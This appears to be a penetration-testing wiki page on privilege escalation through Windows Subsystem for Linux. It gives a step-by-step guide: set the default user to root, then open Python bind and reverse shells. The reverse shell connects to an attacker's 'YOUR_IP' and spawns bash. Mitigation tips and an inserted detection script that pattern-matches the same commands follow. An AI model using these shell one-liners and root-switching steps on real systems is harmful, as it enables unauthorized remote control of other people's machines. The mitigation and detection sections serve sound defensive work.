# EoP - Windows Subsystem for Linux (WSL)

### Key Exploitation Points

1. **Default User Configuration**:\
   WSL allows setting the default user to `root`, granting administrative (root) privileges inside the Linux distribution.
2. **Network Access**:\
   Root access enables opening any port, facilitating bind or reverse shells.
3. **Filesystem Access**:\
   WSL’s filesystem integration allows exploration and potential data exfiltration.

***

### Step-by-Step Exploitation Guide

#### **1. Verifying WSL Installation**

Confirm WSL is installed and configured:

```cmd
wsl --list --verbose
```

This lists each installed distribution together with its state and WSL version.

***

#### **2. Changing the Default User to Root**

Gain `root` privileges by changing the default user:

```cmd
C:\path\to\your\distribution.exe config --default-user root
```

**Example for Ubuntu:**

```cmd
C:\Ubuntu.exe config --default-user root
```

***

#### **3. Verifying Root Access**

After setting the default user to `root`, confirm by running:

```cmd
wsl whoami
```

**Output:** Should return `root`.

***

#### **4. Establishing a Bind or Reverse Shell**

Once you have `root` access, use Python to establish a shell:

**Bind Shell**

Opens a port for incoming connections:

```bash
wsl python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0", PORT));s.listen(1);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);pty.spawn("/bin/bash")'
```

Replace `PORT` with the desired listening port.

***

**Reverse Shell**

Connects back to an external listener:

```bash
wsl python -c 'import socket,os,pty;s=socket.socket();s.connect(("YOUR_IP", YOUR_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
```

Replace `YOUR_IP` and `YOUR_PORT` with the attacker's IP and port.

***

#### **5. Accessing the WSL Filesystem**

The WSL filesystem can be explored directly from Windows:

```plaintext
C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
```

For the Ubuntu package shown, this location contains the root filesystem of the WSL environment.

***

#### **6. Alternative Access via `bash.exe`**

Access WSL through `bash.exe`:

```plaintext
C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
```

Run `bash.exe` to enter the WSL environment directly.

***

### Mitigation Strategies

To secure systems against unauthorized WSL exploitation:

#### **1. Limit WSL Use**

Restrict access to WSL, especially for non-administrative users on sensitive systems.

***

#### **2. Configure User Permissions**

Ensure the default user cannot be set to `root` without administrative approval.

***

#### **3. Network Security**

Monitor and restrict ports opened by WSL to prevent unauthorized bind or reverse shells.

***

#### **4. Audit WSL Activity**

Regularly review WSL configurations and logs for signs of unauthorized changes or suspicious activity.
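
One way to act on this audit step, as an added example that is not part of the original page: a Python triage pass over process-creation records that flags the three behaviours shown in the exploitation steps above (default user set to `root`, an inline Python socket shell launched through `wsl`, and `bash.exe` run from the WinSxS store). The record layout, rule names and sample events are constructed for illustration and are assumptions, not the output format of any specific logging tool.

```python
import re

# Constructed process-creation records as (image path, command line); not real telemetry.
# The WinSxS directory suffix and the 192.0.2.10 address are placeholders.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\wsl.exe", "wsl --list --verbose"),
    (r"C:\Ubuntu.exe", r"C:\Ubuntu.exe config --default-user root"),
    (r"C:\Windows\System32\wsl.exe", "wsl whoami"),
    (r"C:\Windows\System32\wsl.exe",
     "wsl python -c 'import socket,os,pty;s=socket.socket();s.connect((\"192.0.2.10\", 4444));"
     "os.dup2(s.fileno(),0);pty.spawn(\"/bin/bash\")'"),
    (r"C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_CONSTRUCTED\bash.exe", "bash.exe"),
]

# Hypothetical rule name -> (field to inspect, pattern). Patterns mirror the commands on this page.
RULES = {
    "default_user_set_to_root": ("cmd", re.compile(r"\bconfig\s+--default-user\s+root\b", re.I)),
    "wsl_inline_socket_shell": ("cmd", re.compile(
        r"\b(wsl|bash)(\.exe)?\b.*\bpython[\d.]*\s+-c\b.*\bsocket\b.*(dup2|pty\.spawn)", re.I)),
    "bash_run_from_winsxs": ("image", re.compile(
        r"\\WinSxS\\[^\\]*lxssbash[^\\]*\\bash\.exe$", re.I)),
}


def match_rules(image, cmd):
    """Return the sorted names of all rules that fire for one process-creation record."""
    fields = {"image": image, "cmd": cmd}
    return sorted(name for name, (field, rx) in RULES.items() if rx.search(fields[field]))


def triage(events):
    """Return (index, image, rule names) for every record that matched at least one rule."""
    hits = []
    for i, (image, cmd) in enumerate(events):
        fired = match_rules(image, cmd)
        if fired:
            hits.append((i, image, fired))
    return hits


if __name__ == "__main__":
    for idx, image, fired in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {image} -> {', '.join(fired)}")
```

Routine commands such as `wsl --list --verbose` and `wsl whoami` pass through unflagged, so the hits are limited to the configuration change and shell-launch patterns.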

***

#### **5. Keep Systems Updated**

Ensure both Windows and WSL are up-to-date with the latest security patches.

